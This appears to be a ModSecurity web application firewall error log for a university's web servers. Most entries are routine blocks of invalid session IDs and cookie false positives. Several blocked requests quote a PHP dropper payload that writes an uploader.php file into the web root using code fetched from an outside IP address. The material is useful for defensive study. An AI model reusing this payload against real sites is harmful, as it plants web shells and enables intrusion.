[Mon Aug 28 09:06:28.014400 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/images/bg4.jpg"] [unique_id "ZOwBJMCo-f0AAJd1fokAAAAE"]
[Mon Aug 28 09:06:28.014560 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/menu/bgmenu.png"] [unique_id "ZOwBJMCo-f0AAJcb5BAAAAAP"]
[Mon Aug 28 09:06:28.060792 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOwBJMCo-f0AAJdscLMAAAAM"]
[Mon Aug 28 09:06:28.060792 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOwBJMCo-f0AAJdwdPUAAAAA"]
[Mon Aug 28 09:06:28.072345 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/foot/favs2.png"] [unique_id "ZOwBJMCo-f0AAJdtod8AAAAO"]
[Mon Aug 28 09:06:28.094530 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOwBJMCo-f0AAJd2kd0AAAAH"]
[Mon Aug 28 09:06:28.094593 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOwBJMCo-f0AAJcb5BEAAAAP"]
[Mon Aug 28 09:06:28.109702 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOwBJMCo-f0AAJdrnnMAAAAK"]
[Mon Aug 28 09:06:28.126746 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOwBJMCo-f0AAJdwdPYAAAAA"]
[Mon Aug 28 09:06:28.126831 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOwBJMCo-f0AAJdscLQAAAAM"]
[Mon Aug 28 09:06:28.144553 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOwBJMCo-f0AAJcb5BIAAAAP"]
[Mon Aug 28 09:06:28.548627 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOwBJMCo-f0AAJdtoeAAAAAO"]
[Mon Aug 28 09:06:52.216343 2023] [:error] [pid 38773] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOwBPMCo-f0AAJd1fooAAAAE"]
[Mon Aug 28 09:06:52.301410 2023] [:error] [pid 38768] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOwBPMCo-f0AAJdwdPcAAAAA"]
[Mon Aug 28 09:07:00.991356 2023] [:error] [pid 38769] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOwBRMCo-f0AAJdxrT8AAAAS"]
[Mon Aug 28 09:07:01.341097 2023] [:error] [pid 38774] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBRcCo-f0AAJd2kd8AAAAH"]
[Mon Aug 28 09:07:10.403155 2023] [:error] [pid 38769] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOwBTsCo-f0AAJdxrUAAAAAS"]
[Mon Aug 28 09:07:15.613627 2023] [:error] [pid 38774] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOwBU8Co-f0AAJd2keAAAAAH"]
[Mon Aug 28 09:07:15.811935 2023] [:error] [pid 38772] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBU8Co-f0AAJd0nlwAAAAC"]
[Mon Aug 28 09:08:10.343111 2023] [:error] [pid 38763] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwBisCo-f0AAJdrnnYAAAAK"]
[Mon Aug 28 09:08:15.344892 2023] [:error] [pid 38768] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBj8Co-f0AAJdwdPkAAAAA"]
[Mon Aug 28 09:08:34.295280 2023] [:error] [pid 38768] [client 111.94.80.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwBosCo-f0AAJdwdPoAAAAA"]
[Mon Aug 28 09:08:34.780048 2023] [:error] [pid 38763] [client 111.94.80.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBosCo-f0AAJdrnncAAAAK"]
[Mon Aug 28 09:08:35.636359 2023] [:error] [pid 38774] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOwBo8Co-f0AAJd2keEAAAAH"]
[Mon Aug 28 09:08:35.776631 2023] [:error] [pid 38772] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBo8Co-f0AAJd0nl8AAAAC"]
[Mon Aug 28 09:08:43.214579 2023] [:error] [pid 38763] [client 111.94.80.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwBq8Co-f0AAJdrnngAAAAK"]
[Mon Aug 28 09:08:43.362629 2023] [:error] [pid 38765] [client 111.94.80.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBq8Co-f0AAJdtoeUAAAAO"]
[Mon Aug 28 09:09:05.090949 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwBwcCo-f0AAJcb5BcAAAAP"]
[Mon Aug 28 09:09:05.258529 2023] [:error] [pid 38774] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBwcCo-f0AAJd2keIAAAAH"]
[Mon Aug 28 09:09:37.821917 2023] [:error] [pid 38773] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwB4cCo-f0AAJd1fo0AAAAE"]
[Mon Aug 28 09:09:37.840610 2023] [:error] [pid 38774] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwB4cCo-f0AAJd2keUAAAAH"]
[Mon Aug 28 09:09:40.006180 2023] [:error] [pid 38764] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwB5MCo-f0AAJdscLgAAAAM"]
[Mon Aug 28 09:09:40.027091 2023] [:error] [pid 39080] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwB5MCo-f0AAJio1eYAAAAA"]
[Mon Aug 28 09:09:42.741508 2023] [:error] [pid 39009] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwB5sCo-f0AAJhh@GQAAAAB"]
[Mon Aug 28 09:09:44.436992 2023] [:error] [pid 38773] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOwB6MCo-f0AAJd1fo4AAAAE"]
[Mon Aug 28 09:09:44.453045 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwB6MCo-f0AAJcb5BgAAAAP"]
[Mon Aug 28 09:10:47.000838 2023] [:notice] [pid 39164] ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/) configured.
[Mon Aug 28 09:10:47.000875 2023] [:notice] [pid 39164] ModSecurity: APR compiled version="1.5.1-dev"; loaded version="1.5.1-dev"
[Mon Aug 28 09:10:47.000884 2023] [:notice] [pid 39164] ModSecurity: PCRE compiled version="8.31 "; loaded version="8.41 2017-07-05"
[Mon Aug 28 09:10:47.000891 2023] [:warn] [pid 39164] ModSecurity: Loaded PCRE do not match with compiled!
[Mon Aug 28 09:10:47.000896 2023] [:notice] [pid 39164] ModSecurity: LUA compiled version="Lua 5.1"
[Mon Aug 28 09:10:47.000901 2023] [:notice] [pid 39164] ModSecurity: LIBXML compiled version="2.9.1"
[Mon Aug 28 09:24:36.049275 2023] [:error] [pid 39311] [client 202.46.68.208] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "107.158.200.54_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/fnMahasiswa.js"] [unique_id "ZOwFZMCo-f0AAJmPvi4AAAAN"]
[Mon Aug 28 09:24:36.049387 2023] [:error] [pid 39241] [client 202.46.68.208] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "47.128.17.47_d5ae13be7392b2ff9294a5a6fb7a01af2825c089"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/mhs_syaratsidang.js"] [unique_id "ZOwFZMCo-f0AAJlJPMkAAAAA"]
[Mon Aug 28 09:24:36.050293 2023] [:error] [pid 39329] [client 202.46.68.208] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "107.158.200.54_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/mhs_tabs.js"] [unique_id "ZOwFZMCo-f0AAJmhJtAAAAAP"]
[Mon Aug 28 09:40:01.145416 2023] [:error] [pid 39674] [client 180.245.251.164] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "47.128.17.125_d5ae13be7392b2ff9294a5a6fb7a01af2825c089"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/panel/top-bottom.gif"] [unique_id "ZOwJAcCo-f0AAJr6T60AAAAd"]
[Mon Aug 28 10:56:21.211620 2023] [:error] [pid 40914] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOwa5cCo-f0AAJ-SWiIAAAAA"]
[Mon Aug 28 12:59:18.130409 2023] [:error] [pid 43203] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x22c40bc9a142aedd9843a421c88e1c1e8f\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693202358\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}24c7741578ea849101356d9ebce4acaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/auth/login"] [unique_id "ZOw3tsCo-f0AAKjDF8UAAAAB"]
[Mon Aug 28 12:59:18.508007 2023] [:error] [pid 43203] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x22c40bc9a142aedd9843a421c88e1c1e8f\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693202358\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}24c7741578ea849101356d9ebce4acaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOw3tsCo-f0AAKjDF8YAAAAB"]
[Mon Aug 28 13:19:37.771311 2023] [:error] [pid 43574] [client 101.36.112.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:5:{s:10:\\x22session_id\\x22;s:32:\\x22e3448b04f0139e6ca45257a48ddca145\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22101.36.112.218\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Versio\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693203576\\x22;s:20:\\x22login_resunlaprivate\\x22;s:1:\\x220\\x22;}954f436b079389694f1c1cf6dfc51dee"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "p.unla.ac.id"] [uri "/auth/login"] [unique_id "ZOw8ecCo-f0AAKo2RcQAAAAH"]
[Mon Aug 28 14:24:07.805745 2023] [:error] [pid 44954] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOxLl8Co-f0AAK@afgYAAAAQ"]
[Mon Aug 28 15:06:11.371985 2023] [:error] [pid 45673] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "103.131.71.237_db02c4dfe96252ec0e41fec1b5db44e10a1552be"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/window/left-right.png"] [unique_id "ZOxVc8Co-f0AALJpZEgAAAAP"]
[Mon Aug 28 15:06:11.383219 2023] [:error] [pid 45695] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "36.73.46.32_0ba5e8e415dca693f68608774440f10cdf3ede12"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/panel/tool-sprites.gif"] [unique_id "ZOxVc8Co-f0AALJ--K8AAAAc"]
[Mon Aug 28 15:06:11.383341 2023] [:error] [pid 45682] [client 203.176.176.235] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "52.167.144.56_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/images/default/window/top-bottom.png"] [unique_id "ZOxVc8Co-f0AALJyGBwAAAAJ"]
[Mon Aug 28 15:17:52.545958 2023] [:error] [pid 45908] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOxYMMCo-f0AALNUpMgAAAAM"]
[Mon Aug 28 16:16:36.514086 2023] [:error] [pid 47123] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOxl9MCo-f0AALgTvo0AAAAB"]
[Mon Aug 28 16:37:41.080781 2023] [:error] [pid 47323] [client 114.79.54.96] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "92.223.85.64_3bc502ef5f769384b905d8481265ba50974f998b"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/mhs_absen.js"] [unique_id "ZOxq5cCo-f0AALjbMhkAAAAV"]
[Mon Aug 28 16:37:41.081945 2023] [:error] [pid 47473] [client 114.79.54.96] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.5.251.69_7f6db45c1c52196446be482c23fdf8894ecdbc81"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_akademic/mahasiswa/mhs_det_dpp.js"] [unique_id "ZOxq5cCo-f0AALlxYKwAAAAL"]
